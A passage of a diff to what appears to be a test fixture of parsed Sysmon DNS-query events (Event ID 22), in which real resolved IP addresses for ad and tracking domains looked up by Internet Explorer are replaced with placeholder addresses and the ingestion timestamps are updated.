Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029880600Z'/\u003e\u003cEventRecordID\u003e130\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epixel.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.pixel.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9682,19 +9585,19 @@ }, "answers": [ { - "data": "35.171.48.231", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.107.32", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.175.80.59", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9702,7 +9605,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9710,7 +9613,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9718,7 +9621,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9726,23 +9629,23 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -9757,24 +9660,22 @@ "ml314.com" ], "ip": [ - "35.171.48.231", - "52.206.107.32", - "35.175.80.59", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313865872Z", + "ingested": "2021-12-09T13:49:44.739562300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.171.48.231;::ffff:52.206.107.32;::ffff:35.175.80.59;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029890100Z'/\u003e\u003cEventRecordID\u003e131\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.894\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eml314.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9834,15 +9735,15 @@ }, "answers": [ { - "data": "156.154.200.36", + "data": "89.160.20.156", "type": "A" }, { - "data": "63.251.88.56", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -9850,7 +9751,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -9858,7 +9759,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -9866,7 +9767,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -9874,7 +9775,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -9883,17 +9784,17 @@ } ], "resolved_ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, @@ -9909,24 +9810,23 @@ "aa.agkn.com" ], "ip": [ - "156.154.200.36", - "63.251.88.56", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313867653Z", + "ingested": "2021-12-09T13:49:44.739568200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:156.154.200.36;::ffff:63.251.88.56;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029900000Z'/\u003e\u003cEventRecordID\u003e132\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.902\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eaa.agkn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -9990,11 +9890,11 @@ "type": "CNAME" }, { - "data": "172.217.10.134", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -10002,7 +9902,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -10010,7 +9910,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -10018,7 +9918,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -10026,21 +9926,21 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" } ], "resolved_ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "network": { @@ -10056,22 +9956,22 @@ "s0.2mdn.net" ], "ip": [ - "172.217.10.134", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30" + "192.168.94.30" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313869152Z", + "ingested": "2021-12-09T13:49:44.739574100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:172.217.10.134;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029909900Z'/\u003e\u003cEventRecordID\u003e133\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003es0.2mdn.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 s0-2mdn-net.l.google.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -10139,17 +10039,17 @@ "type": "CNAME" }, { - "data": "23.50.53.195", + "data": "89.160.20.156", "type": "A" }, { - "data": "23.50.53.185", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -10166,14 +10066,13 @@ "b.scorecardresearch.com" ], "ip": [ - "23.50.53.195", - "23.50.53.185" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313870523Z", + "ingested": "2021-12-09T13:49:44.739580Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:23.50.53.195;::ffff:23.50.53.185;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.029920400Z'/\u003e\u003cEventRecordID\u003e134\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eb.scorecardresearch.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 b.scorecardresearch.com.edgesuite.net;type: 5 a1294.w20.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.029Z", @@ -10237,27 +10136,27 @@ "type": "CNAME" }, { - "data": "151.101.130.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.194.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.2.2", + "data": "89.160.20.156", "type": "A" }, { - "data": "151.101.66.2", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156" ] }, "network": { @@ -10273,16 +10172,13 @@ "edw.edmunds.com" ], "ip": [ - "151.101.130.2", - "151.101.194.2", - "151.101.2.2", - "151.101.66.2" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313871809Z", + "ingested": "2021-12-09T13:49:44.739585800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:151.101.130.2;::ffff:151.101.194.2;::ffff:151.101.2.2;::ffff:151.101.66.2;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.548958100Z'/\u003e\u003cEventRecordID\u003e135\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.921\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eedw.edmunds.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 f2.shared.global.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:04.548Z", @@ -10346,12 +10242,12 @@ "type": "CNAME" }, { - "data": "72.21.91.29", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "network": { @@ -10367,13 +10263,13 @@ "ocsp.digicert.com" ], "ip": [ - "72.21.91.29" + "89.160.20.156" ] }, "event": { - "ingested": "2021-10-14T04:10:32.313873032Z", + "ingested": "2021-12-09T13:49:44.739591600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.692712500Z'/\u003e\u003cEventRecordID\u003e136\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.101\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eocsp.digicert.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 